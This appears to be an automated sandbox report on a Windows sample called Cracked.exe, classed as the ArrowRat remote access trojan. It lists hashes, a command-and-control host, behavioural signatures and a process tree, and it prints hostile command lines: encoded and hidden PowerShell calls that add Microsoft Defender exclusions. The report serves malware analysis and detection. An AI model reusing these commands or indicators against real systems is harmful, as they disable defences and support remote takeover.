Analysis

  • max time kernel
    144s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-07-2023 20:40

General

  • Target

    Cracked.exe

  • Size

    2.4MB

  • MD5

    6eb284564aa7bd24f4f6df02ef05d185

  • SHA1

    47f85ddc0b1a090d1852c37b2e2e1449e5b6db88

  • SHA256

    2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb

  • SHA512

    49e1a9584c74f32f9566d3c4ca31684c474ec260e50bd07b8d3c0a8ef3f3e70d10773952e5d219aa8c9076b86cddcefd242dfb91b507feeb06c5d69ba9e91179

  • SSDEEP

    49152:Wm7ZuvKRXc8DJ2c2Xp95LBO1PJNNNQzgj7k/8E54IlDXRRtdQNH:D77P2XPOxJ9FcEq4IZXRRC

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

line-ellis.gl.at.ply.gg:10735

Mutex

nAChhjAnR

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cracked.exe
    "C:\Users\Admin\AppData\Local\Temp\Cracked.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1560
    • C:\Windows\Client.exe
      "C:\Windows\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3084
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
        3⤵
          PID:4192
        • C:\Windows\explorer.exe
          "C:\Windows\explorer.exe"
          3⤵
          • Modifies Installed Components in the registry
          • Enumerates connected drives
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2096
        • C:\Windows\System32\ComputerDefaults.exe
          "C:\Windows\System32\ComputerDefaults.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1984
          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
            "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4596
      • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
        "C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:3828
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4428
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:796
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 796 -s 3968
        2⤵
        • Program crash
        PID:3668
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 408 -p 796 -ip 796
      1⤵
        PID:4072
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:4036
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 4036 -s 3604
          2⤵
          • Program crash
          PID:936
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 476 -p 4036 -ip 4036
        1⤵
          PID:1920
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:3420
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 3420 -s 3552
            2⤵
            • Program crash
            PID:3312
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 440 -p 3420 -ip 3420
          1⤵
            PID:4120
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:3928
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 3928 -s 3584
              2⤵
              • Program crash
              PID:2680
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 420 -p 3928 -ip 3928
            1⤵
              PID:4812
            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
              1⤵
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:3220
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 3220 -s 3572
                2⤵
                • Program crash
                PID:1312
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -pss -s 188 -p 3220 -ip 3220
              1⤵
                PID:1392
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                  PID:1260

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  cadef9abd087803c630df65264a6c81c

                  SHA1

                  babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                  SHA256

                  cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                  SHA512

                  7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

                  Filesize

                  97B

                  MD5

                  6b3c7df657dac84939df4efdd1a1c4c1

                  SHA1

                  570cdd50e12f70ec5ee6e6da38f88f6eb7682733

                  SHA256

                  2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

                  SHA512

                  79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

                  Filesize

                  36KB

                  MD5

                  8aaad0f4eb7d3c65f81c6e6b496ba889

                  SHA1

                  231237a501b9433c292991e4ec200b25c1589050

                  SHA256

                  813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

                  SHA512

                  1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe

                  Filesize

                  36KB

                  MD5

                  406347732c383e23c3b1af590a47bccd

                  SHA1

                  fae764f62a396f2503dd81eefd3c7f06a5fb8e5f

                  SHA256

                  e0a9f5c75706dc79a44d0c890c841b2b0b25af4ee60d0a16a7356b067210038e

                  SHA512

                  18905eaad8184bb3a7b0fe21ff37ed2ee72a3bd24bb90cbfcad222cf09e2fa74e886d5c687b21d81cd3aec1e6c05891c24f67a8f82bafd2aceb0e0dcb7672ce7

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

                  Filesize

                  97B

                  MD5

                  6b3c7df657dac84939df4efdd1a1c4c1

                  SHA1

                  570cdd50e12f70ec5ee6e6da38f88f6eb7682733

                  SHA256

                  2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

                  SHA512

                  79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

                  Filesize

                  97B

                  MD5

                  6b3c7df657dac84939df4efdd1a1c4c1

                  SHA1

                  570cdd50e12f70ec5ee6e6da38f88f6eb7682733

                  SHA256

                  2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

                  SHA512

                  79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

                  Filesize

                  97B

                  MD5

                  6b3c7df657dac84939df4efdd1a1c4c1

                  SHA1

                  570cdd50e12f70ec5ee6e6da38f88f6eb7682733

                  SHA256

                  2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

                  SHA512

                  79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\K9G5AECL\microsoft.windows[1].xml

                  Filesize

                  97B

                  MD5

                  6b3c7df657dac84939df4efdd1a1c4c1

                  SHA1

                  570cdd50e12f70ec5ee6e6da38f88f6eb7682733

                  SHA256

                  2a975e69f7fb0acf7ca4c5af0c8704effb0fee770b91634b20d383f3122b8198

                  SHA512

                  79c02cda377d14c0b966b385e9a6f0357bfc9060a987cf0a181c41deb32c752f2768a073c5477379de94476379af189c296172cbe8621ac36cf045a04d7d16b0

                • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

                  Filesize

                  2.2MB

                  MD5

                  70f3bc193dfa56b78f3e6e4f800f701f

                  SHA1

                  1e5598f2de49fed2e81f3dd8630c7346a2b89487

                  SHA256

                  3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                  SHA512

                  3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

                  Filesize

                  2.2MB

                  MD5

                  70f3bc193dfa56b78f3e6e4f800f701f

                  SHA1

                  1e5598f2de49fed2e81f3dd8630c7346a2b89487

                  SHA256

                  3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                  SHA512

                  3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

                  Filesize

                  2.2MB

                  MD5

                  70f3bc193dfa56b78f3e6e4f800f701f

                  SHA1

                  1e5598f2de49fed2e81f3dd8630c7346a2b89487

                  SHA256

                  3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                  SHA512

                  3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjeqfquk.se0.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\nshBEDD.tmp\System.dll

                  Filesize

                  11KB

                  MD5

                  a4dd044bcd94e9b3370ccf095b31f896

                  SHA1

                  17c78201323ab2095bc53184aa8267c9187d5173

                  SHA256

                  2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

                  SHA512

                  87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

                • C:\Users\Admin\AppData\Local\Temp\nshBEDD.tmp\nsDialogs.dll

                  Filesize

                  9KB

                  MD5

                  0d45588070cf728359055f776af16ec4

                  SHA1

                  c4375ceb2883dee74632e81addbfa4e8b0c6d84a

                  SHA256

                  067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a

                  SHA512

                  751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

                • C:\Users\Admin\AppData\Local\Temp\nshBEDD.tmp\nsDialogs.dll

                  Filesize

                  9KB

                  MD5

                  0d45588070cf728359055f776af16ec4

                  SHA1

                  c4375ceb2883dee74632e81addbfa4e8b0c6d84a

                  SHA256

                  067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a

                  SHA512

                  751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

                • C:\Windows\Client.exe

                  Filesize

                  158KB

                  MD5

                  d7dea9816b882cb53d615a3afdf0c955

                  SHA1

                  d3bfd91ff74c072028bd747d4f56f17cc55168a5

                  SHA256

                  96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                  SHA512

                  b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                • C:\Windows\Client.exe

                  Filesize

                  158KB

                  MD5

                  d7dea9816b882cb53d615a3afdf0c955

                  SHA1

                  d3bfd91ff74c072028bd747d4f56f17cc55168a5

                  SHA256

                  96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                  SHA512

                  b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                • C:\Windows\Client.exe

                  Filesize

                  158KB

                  MD5

                  d7dea9816b882cb53d615a3afdf0c955

                  SHA1

                  d3bfd91ff74c072028bd747d4f56f17cc55168a5

                  SHA256

                  96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                  SHA512

                  b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                • memory/796-241-0x000002703B460000-0x000002703B480000-memory.dmp

                  Filesize

                  128KB

                • memory/796-243-0x000002703B420000-0x000002703B440000-memory.dmp

                  Filesize

                  128KB

                • memory/796-245-0x000002703B830000-0x000002703B850000-memory.dmp

                  Filesize

                  128KB

                • memory/1560-211-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/1560-184-0x000002282E100000-0x000002282E122000-memory.dmp

                  Filesize

                  136KB

                • memory/1560-197-0x000002282E1F0000-0x000002282E200000-memory.dmp

                  Filesize

                  64KB

                • memory/1560-201-0x000002282E1F0000-0x000002282E200000-memory.dmp

                  Filesize

                  64KB

                • memory/1560-164-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/1560-165-0x000002282E1F0000-0x000002282E200000-memory.dmp

                  Filesize

                  64KB

                • memory/1560-166-0x000002282E1F0000-0x000002282E200000-memory.dmp

                  Filesize

                  64KB

                • memory/2096-235-0x00000000033E0000-0x00000000033E1000-memory.dmp

                  Filesize

                  4KB

                • memory/3044-134-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3044-135-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3044-136-0x0000000001360000-0x0000000001370000-memory.dmp

                  Filesize

                  64KB

                • memory/3044-162-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3044-133-0x00000000007C0000-0x0000000000A20000-memory.dmp

                  Filesize

                  2.4MB

                • memory/3084-213-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3084-150-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3084-149-0x0000023230310000-0x000002323033E000-memory.dmp

                  Filesize

                  184KB

                • memory/3220-328-0x0000025519300000-0x0000025519320000-memory.dmp

                  Filesize

                  128KB

                • memory/3220-325-0x0000025518BB0000-0x0000025518BD0000-memory.dmp

                  Filesize

                  128KB

                • memory/3220-322-0x0000025518F00000-0x0000025518F20000-memory.dmp

                  Filesize

                  128KB

                • memory/3420-285-0x0000020303290000-0x00000203032B0000-memory.dmp

                  Filesize

                  128KB

                • memory/3420-289-0x00000203038E0000-0x0000020303900000-memory.dmp

                  Filesize

                  128KB

                • memory/3420-283-0x00000203032D0000-0x00000203032F0000-memory.dmp

                  Filesize

                  128KB

                • memory/3928-304-0x000001BA34780000-0x000001BA347A0000-memory.dmp

                  Filesize

                  128KB

                • memory/3928-306-0x000001BA34740000-0x000001BA34760000-memory.dmp

                  Filesize

                  128KB

                • memory/3928-309-0x000001BA34B90000-0x000001BA34BB0000-memory.dmp

                  Filesize

                  128KB

                • memory/4036-262-0x0000017478780000-0x00000174787A0000-memory.dmp

                  Filesize

                  128KB

                • memory/4036-264-0x0000017478740000-0x0000017478760000-memory.dmp

                  Filesize

                  128KB

                • memory/4036-267-0x0000017478B90000-0x0000017478BB0000-memory.dmp

                  Filesize

                  128KB

                • memory/4192-161-0x0000000000400000-0x0000000000418000-memory.dmp

                  Filesize

                  96KB

                • memory/4192-233-0x00000000058D0000-0x00000000058E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4192-204-0x0000000006790000-0x00000000067E0000-memory.dmp

                  Filesize

                  320KB

                • memory/4192-173-0x00000000055B0000-0x0000000005642000-memory.dmp

                  Filesize

                  584KB

                • memory/4192-189-0x0000000005650000-0x00000000056EC000-memory.dmp

                  Filesize

                  624KB

                • memory/4192-198-0x00000000058D0000-0x00000000058E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4192-171-0x0000000074140000-0x00000000748F0000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4192-199-0x0000000005E90000-0x0000000006434000-memory.dmp

                  Filesize

                  5.6MB

                • memory/4192-232-0x0000000074140000-0x00000000748F0000-memory.dmp

                  Filesize

                  7.7MB

                • memory/4192-200-0x0000000005D90000-0x0000000005DF6000-memory.dmp

                  Filesize

                  408KB

                • memory/4596-231-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4596-229-0x000001A74AE10000-0x000001A74AE20000-memory.dmp

                  Filesize

                  64KB

                • memory/4596-228-0x000001A74AE10000-0x000001A74AE20000-memory.dmp

                  Filesize

                  64KB

                • memory/4596-224-0x00007FFA81000000-0x00007FFA81AC1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4596-214-0x000001A74AE10000-0x000001A74AE20000-memory.dmp

                  Filesize

                  64KB